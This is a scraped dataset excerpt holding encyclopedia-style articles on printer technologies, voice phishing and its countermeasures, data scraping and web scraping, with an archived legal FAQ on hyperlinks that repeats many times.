time. Four principal designs exist. In each case, to print a line, precisely timed hammers strike against the back of the paper at the exact moment that the correct character to be printed is passing in front of the paper. The paper presses forward against a ribbon which then presses against the character form and the impression of the character form is printed onto the paper. Each system could have slight timing issues, which could cause minor misalignment of the resulting printed characters. For drum or typebar printers, this appeared as vertical misalignment, with characters being printed slightly above or below the rest of the line. In chain or bar printers, the misalignment was horizontal, with printed characters being crowded closer together or farther apart. This was much less noticeable to human vision than vertical misalignment, where characters seemed to bounce up and down in the line, so they were considered as higher quality print. Line printers are the fastest of all impact printers and are used for bulk printing in large computer centres. A line printer can print at 1100 lines per minute or faster, frequently printing pages more rapidly than many current laser printers. On the other hand, the mechanical components of line printers operate with tight tolerances and require regular preventive maintenance (PM) to produce a top quality print. They are virtually never used with personal computers and have now been replaced by high-speed laser printers. The legacy of line printers lives on in many operating systems, which use the abbreviations "lp", "lpr", or "LPT" to refer to printers. Liquid ink electrostatic printers use a chemical coated paper, which is charged by the print head according to the image of the document. 23 The paper is passed near a pool of liquid ink with the opposite charge. The charged areas of the paper attract the ink and thus form the image. This process was developed from the process of electrostatic copying. 24 Color reproduction is very accurate, and because there is no heating the scale distortion is less than 0.1%. (All laser printers have an accuracy of 1%.) Worldwide, most survey offices used this printer before color inkjet plotters become popular. Liquid ink electrostatic printers were mostly available in 36 to 54 inches (910 to 1,370 mm) width and also 6 color printing. These were also used to print large billboards. It was first introduced by Versatec, which was later bought by Xerox. 3M also used to make these printers. 25 Pen-based plotters were an alternate printing technology once common in engineering and architectural firms. Pen-based plotters rely on contact with the paper (but not impact, per se) and special purpose pens that are mechanically run over the paper to create text and images. Since the pens output continuous lines, they were able to produce technical drawings of higher resolution than was achievable with dot-matrix technology. 26 Some plotters used roll-fed paper, and therefore had a minimal restriction on the size of the output in one dimension. These plotters were capable of producing quite sizable drawings. A number of other sorts of printers are important for historical reasons, or for special purpose uses. Printers can be connected to computers in many ways: directly by a dedicated data cable such as the USB, through a short-range radio like Bluetooth, a local area network using cables (such as the Ethernet) or radio (such as WiFi), or on a standalone basis without a computer, using a memory card or other portable data storage device. Most printers other than line printers accept control characters or unique character sequences to control various printer functions. These may range from shifting from lower to upper case or from black to red ribbon on typewriter printers to switching fonts and changing character sizes and colors on raster printers. Early printer controls were not standardized, with each manufacturer's equipment having its own set. The IBM Personal Printer Data Stream (PPDS) became a commonly used command set for dot-matrix printers. Today, most printers accept one or more page description languages (PDLs). Laser printers with greater processing power frequently offer support for variants of Hewlett-Packard's Printer Command Language (PCL), PostScript or XML Paper Specification. Most inkjet devices support manufacturer proprietary PDLs such as ESC P. The diversity in mobile platforms have led to various standardization efforts around device PDLs such as the Printer Working Group (PWG's) PWG Raster. The speed of early printers was measured in units of characters per minute (cpm) for character printers, or lines per minute (lpm) for line printers. Modern printers are measured in pages per minute (ppm). These measures are used primarily as a marketing tool, and are not as well standardised as toner yields. Usually pages per minute refers to sparse monochrome office documents, rather than dense pictures which usually print much more slowly, especially color images. Speeds in ppm usually apply to A4 paper in most countries in the world, and letter paper size, about 6% shorter, in North America. The data received by a printer may be: Some printers can process all four types of data, others not. Today it is possible to print everything (even plain text) by sending ready bitmapped images to the printer. This allows better control over formatting, especially among machines from different vendors. Many printer drivers do not use the text mode at all, even if the printer is capable of it. 6 A monochrome printer can only produce monochrome images, with only shades of a single color. Most printers can produce only two colors, black (ink) and white (no ink). With half-tonning techniques, however, such a printer can produce acceptable grey-scale images too A color printer can produce images of multiple colors. A photo printer is a color printer that can produce images that mimic the color range (gamut) and resolution of prints made from photographic film. The page yield is the number of pages that can be printed from a toner cartridge or ink cartridge—before the cartridge needs to be refilled or replaced. The actual number of pages yielded by a specific cartridge depends on a number of factors. 27 For a fair comparison, many laser printer manufacturers use the ISO IEC 19752 process to measure the toner cartridge yield. 28 29 In order to fairly compare operating expenses of printers with a relatively small ink cartridge to printers with a larger, more expensive toner cartridge that typically holds more toner and so prints more pages before the cartridge needs to be replaced, many people prefer to estimate operating expenses in terms of cost per page (CPP). 28 Retailers often apply the "razor and blades" model: a company may sell a printer at cost and make profits on the ink cartridge, paper, or some other replacement part. This has caused legal disputes regarding the right of companies other than the printer manufacturer to sell compatible ink cartridges. To protect their business model, several manufacturers invest heavily in developing new cartridge technology and patenting it. Other manufacturers, in reaction to the challenges from using this business model, choose to make more money on printers and less on ink, promoting the latter through their advertising campaigns. Finally, this generates two clearly different proposals: "cheap printer expensive ink" or "expensive printer cheap ink". Ultimately, the consumer decision depends on their reference interest rate or their time preference. From an economics viewpoint, there is a clear trade-off between cost per copy and cost of the printer. Printer steganography is a type of steganography "hiding data within data" 30 produced by color printers, including Brother, Canon, Dell, Epson, HP, IBM, Konica Minolta, Kyocera, Lanier, Lexmark, Ricoh, Toshiba and Xerox 31 brand color laser printers, where tiny yellow dots are added to each page. The dots are barely visible and contain encoded printer serial numbers, as well as date and time stamps. As of 2020 2021, the largest worldwide vendor of printers is Hewlett-Packard, followed by Canon, Brother, Seiko Epson and Kyocera. 32 Other known vendors include NEC, Ricoh, Xerox, Lexmark, 33 OKI, Sharp, Konica Minolta, Samsung, Kodak, Dell, Toshiba, Star Micronics, Citizen and Panasonic. |
304 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Voice_phishing | Voice phishing, or vishing, 1 is the use of telephony (often Voice over IP telephony) to conduct phishing attacks. Landline telephone services have traditionally been trustworthy; terminated in physical locations known to the telephone company, and associated with a bill-payer. Now however, vishing fraudsters often use modern Voice over IP (VoIP) features such as caller ID spoofing and automated systems (IVR) to impede detection by law enforcement agencies. Voice phishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals. Usually, voice phishing attacks are conducted using automated text-to-speech systems that direct a victim to call a number controlled by the attacker, however some use live callers. 1 Posing as an employee of a legitimate body such as the bank, police, telephone or internet provider, the fraudster attempts to obtain personal details and financial information regarding credit card, bank accounts (e.g. the PIN), as well as personal information of the victim. With the received information, the fraudster might be able to access and empty the account or commit identity fraud. Some fraudsters may also try to persuade the victim to transfer money to another bank account or withdraw cash to be given to them directly. 2 Callers also often pose as law enforcement or as an Internal Revenue Service employee. 3 4 Scammers often target immigrants and the elderly, 5 who are coerced to wire hundreds to thousands of dollars in response to threats of arrest or deportation. 3 Bank account data is not the only sensitive information being targeted. Fraudsters sometimes also try to obtain security credentials from consumers who use Microsoft or Apple products by spoofing the caller ID of Microsoft or Apple Inc. Audio deepfakes have been used to commit fraud, by fooling people into thinking they are receiving instructions from a trusted individual. 6 Common motives include financial reward, anonymity, and fame. 13 Confidential banking information can be utilized to access the victims' assets. Individual credentials can be sold to individuals who would like to hide their identity to conduct certain activities, such as acquiring weapons. 13 This anonymity is perilous and may be difficult to track by law enforcement. Another rationale is that phishers may seek fame among the cyber attack community. 13 Voice phishing comes in various forms. There are various methods and various operation structures for the different types of phishing. Usually, scammers will employ social engineering to convince victims of a role they are playing and to create a sense of urgency to leverage against the victims. Voice phishing has unique attributes that separate the attack method from similar alternatives such as email phishing. With the increased reach of mobile phones, phishing allows for the targeting of individuals without working knowledge of email but who possess a phone, such as the elderly. The historical prevalence of call centers that ask for personal and confidential information additionally allows for easier extraction of sensitive information from victims due to the trust many users have while speaking to someone on the phone. Through voice communication, vishing attacks can be personable and therefore more impactful than similar alternatives such as email. The faster response time to an attack attempt due to the increased accessibility to a phone is another unique aspect, in comparison to an email where the victim may take longer time to respond. 14 A phone number is difficult to block and scammers can often simply change phone numbers if a specific number is blocked and often find ways around rules and regulations. Phone companies and governments are constantly seeking new ways to curb false scam calls. 15 A voice phishing attack may be initiated through different delivery mechanisms. 16 A scammer may directly call a victim and pretend to be a trustworthy person by spoofing their caller ID, appearing on the phone as an official or someone nearby. 16 Scammers may also deliver pre-recorded, threatening messages to victims' voicemail inboxes to coerce victims into taking action. 16 Victims may also receive a text message which requests them to call a specified number and be charged for calling the specific number. 16 Additionally, the victim may receive an email impersonating a bank; The victim then may be coerced into providing private information, such as a PIN, account number, or other authentication credentials in the phone call. 16 Voice phishing attackers will often employ social engineering to convince victims to give them money and or access to personal data. 17 Generally, scammers will attempt to create a sense of urgency and or a fear of authority to use as a leverage against the victims. 16 Voice phishing attacks can be difficult for victims to identify because legitimate institutions such as banks sometimes ask for sensitive personal information over the phone. 8 Phishing schemes may employ pre-recorded messages of notable, regional banks to make them indistinguishable from legitimate calls. citation needed Additionally, victims, particularly the elderly, 8 may forget or not know about scammers' ability to modify their caller ID, making them more vulnerable to voice phishing attacks. citation needed The US Federal Trade Commission (FTC) suggests several ways for the average consumer to detect phone scams. 22 The FTC warns against making payments using cash, gift cards, and prepaid cards, and asserts that government agencies do not call citizens to discuss personal information such as Social Security numbers. 22 Additionally, potential victims can pay attention to characteristics of the phone call, such as the tone or accent of the caller 8 28 or the urgency of the phone call 22 to determine whether or not the call is legitimate. The primary strategy recommended by the FTC to avoid falling victim to voice phishing is to not answer calls from unknown numbers. 9 However, when a scammer utilizes VoIP to spoof their caller ID, or in circumstances where victims do answer calls, other strategies include not pressing buttons when prompted, and not answering any questions asked by a suspicious caller. 9 On March 31, 2020, in an effort to reduce vishing attacks that utilize caller ID spoofing, the US Federal Communications Commission adopted a set of mandates known as STIR SHAKEN, a framework intended to be used by phone companies to authenticate caller ID information. 29 All U.S. phone service providers had until June 30, 2021, to comply with the order and integrate STIR SHAKEN into their infrastructure to lessen the impact of caller ID spoofing. 29 In some countries, social media is used to call and communicate with the public. On certain social media platforms, government and bank profiles are verified and unverified government and bank profiles would be fake profiles. 30 The most direct and effective mitigation strategy is training the general public to understand common traits of a voice phishing attack to detect phishing messages. 31 A more technical approach would be the use of software detection methods. Generally, such mechanisms are able to differentiate between phishing calls and honest messages and can be more cheaply implemented than public training. 31 A straightforward method of phishing detection is the usage of blacklists. Recent research has attempted to make accurate distinctions between legitimate calls and phishing attacks using artificial intelligence and data analysis. 32 To further advance research in the fake audio field, different augmentations and feature designs have been explored. 33 By analyzing and converting phone calls to texts, artificial intelligence mechanisms such as natural language processing can be used to identify if the phone call is a phishing attack. 32 Specialized systems, such as phone apps, can submit fake data to phishing calls. Additionally, various law enforcement agencies are continually making efforts to discourage scammers from conducting phishing calls by imposing harsher penalties upon attackers. 31 29 Between 2012 and 2016, a voice phishing scam ring posed as Internal Revenue Service and immigration employees to more than 50,000 individuals, stealing hundreds of millions of dollars as well as victims' personal information. 5 Alleged co-conspirators from the United States and India threatened vulnerable respondents with "arrest, imprisonment, fines, or deportation. 5 In 2018, 24 defendants were sentenced, with the longest imprisonment being 20 years. 5 On March 28, 2021, the Federal Communications Commission issued a statement warning Americans of the rising number of phone scams regarding fraudulent COVID 19 products. 34 Voice phishing schemes attempting to sell products which putatively "prevent, treat, mitigate, diagnose or cure" COVID 19 have been monitored by the Food and Drug Administration as well. 35 Beginning in 2015, a phishing scammer impersonated Hollywood make-up artists and powerful female executives to coerce victims to travel to Indonesia and pay sums of money under the premise that they'll be reimbursed. Using social engineering, the scammer researched the lives of their victims extensively to mine details to make the impersonation more believable. The scammer called victims directly, often multiple times a day and for hours at a time to pressure victims. 36 The 2015 cyber attack campaign against the Israeli academic Dr. Thamar Eilam Gindin illustrates the use of a vishing attack as a precursor to escalating future attacks with the new information coerced from a victim. After the Iran-expert academic mentioned connections within Iran on Israeli Army Radio, Thamar received a phone call to request an interview with the professor for the Persian BBC. To view the questions ahead of the proposed interview, Thamar was instructed to access a Google Drive document that requested her password for access. By entering her password to access the malicious document, the attacker can use the credentials for further elevated attacks. 37 In Sweden, Mobile Bank ID is a phone app (launched 2011) that is used to identify a user in internet banking. The user logs in to the bank on a computer, the bank activates the phone app, the user enters a password in the phone and is logged in. In this scam, malicious actors called people claiming to be a bank officer, claimed there was a security problem, and asked the victim to use their Mobile Bank ID app. Fraudsters were then able to log in to the victim's account without the victim providing their password. The fraudster was then able to transfer money from the victim's account. If the victim was a customer of the Swedish bank Nordea, scammers were also able to use the victim's account directly from their phone. In 2018, the app was changed to require users to photograph a QR code on their computer screen. This ensures that the phone and the computer are colocated, which has largely eliminated this type of fraud. |
305 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Report_mining | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
306 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20020308222536/http://www.chillingeffects.org/linking/faq.cgi#QID596 | Q: What is a hyperlink? Q: If a hyperlink is just a location pointer, how can it be illegal? Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. top Question: What is an "inline" image? Answer: An "inline" image refers to a graphic displayed in the context of a page, such as the picture here: HTML (Hypertext Markup Language) permits web authors to "inline" both images from their own websites and images hosted on other servers. When people complain about inline images, they are most often complaining about web pages that include graphics from external sources. top Question: What is the Robots Exclusion standard? Answer: Robots (or 'bots or webcrawlers) are automated web browsers that "crawl" the web to retrieve web pages, for example on behalf of search engines or price comparison sites. The Robots Exclusion standard is an informal convention many of these robots obey, by which webmasters can place a "robots.txt" file on the webserver to tell web robots to avoid some pages or entire sites. Q: What is a hyperlink? Q: If a hyperlink is just a location pointer, how can it be illegal? Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. top Question: What is an "inline" image? Answer: An "inline" image refers to a graphic displayed in the context of a page, such as the picture here: HTML (Hypertext Markup Language) permits web authors to "inline" both images from their own websites and images hosted on other servers. When people complain about inline images, they are most often complaining about web pages that include graphics from external sources. Q: If a hyperlink is just a location pointer, how can it be illegal? Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: a href "http: chillingeffects.org linking link a top Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function, even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. top Question: What is an "inline" image? Answer: An "inline" image refers to a graphic displayed in the context of a page, such as the picture here: HTML (Hypertext Markup Language) permits web authors to "inline" both images from their own websites and images hosted on other servers. When people complain about inline images, they are most often complaining about web pages that include graphics from external sources. top Question: What is the Robots Exclusion standard? Answer: Robots (or 'bots or webcrawlers) are automated web browsers that "crawl" the web to retrieve web pages, for example on behalf of search engines or price comparison sites. The Robots Exclusion standard is an informal convention many of these robots obey, by which webmasters can place a "robots.txt" file on the webserver to tell web robots to avoid some pages or entire sites. top Linking Patent Goes to Court, Reuters, February 7, 2002 Bigger Not Better With Copyrighted Web Photos, Brenda Sandburg, The Recorder, February 7, 2002 Court Denies Ford Preliminary Injunction Against Fuckgeneralmotors.com, Robert H. Cleland, U.S. District Court, Eastern Dist. Michigan, December 20, 2001 Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more Bigger Not Better With Copyrighted Web Photos, Brenda Sandburg, The Recorder, February 7, 2002 Court Denies Ford Preliminary Injunction Against Fuckgeneralmotors.com, Robert H. Cleland, U.S. District Court, Eastern Dist. Michigan, December 20, 2001 Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more Court Denies Ford Preliminary Injunction Against Fuckgeneralmotors.com, Robert H. Cleland, U.S. District Court, Eastern Dist. Michigan, December 20, 2001 Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more Experts Say DeCSS Decision Could Undermine Online Journalists, Carl S. Kaplan, New York Times Cyberlaw Journal, December 14, 2001 Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more Big Stink Over a Simple Link, Farhad Manjoo, Wired News, December 6, 2001 more more Links and Law, Tim Berners-Lee (personal view) Kelly v. Arriba Soft, 9th Circuit Court of Appeals (case) The Link Controversy Page, Stefan Bechtold (reference) Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more Kelly v. Arriba Soft, 9th Circuit Court of Appeals (case) The Link Controversy Page, Stefan Bechtold (reference) Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more The Link Controversy Page, Stefan Bechtold (reference) Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more Ticketmaster v. Tickets.com, U.S. District Court, Central District of California (case) Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more Amicus brief opposing DeCSS hyperlink injunction, Openlaw DVD (legal brief) more more Frequently Asked Questions (and Answers) disclaimer privacy about us contacts |
307 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-27 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which 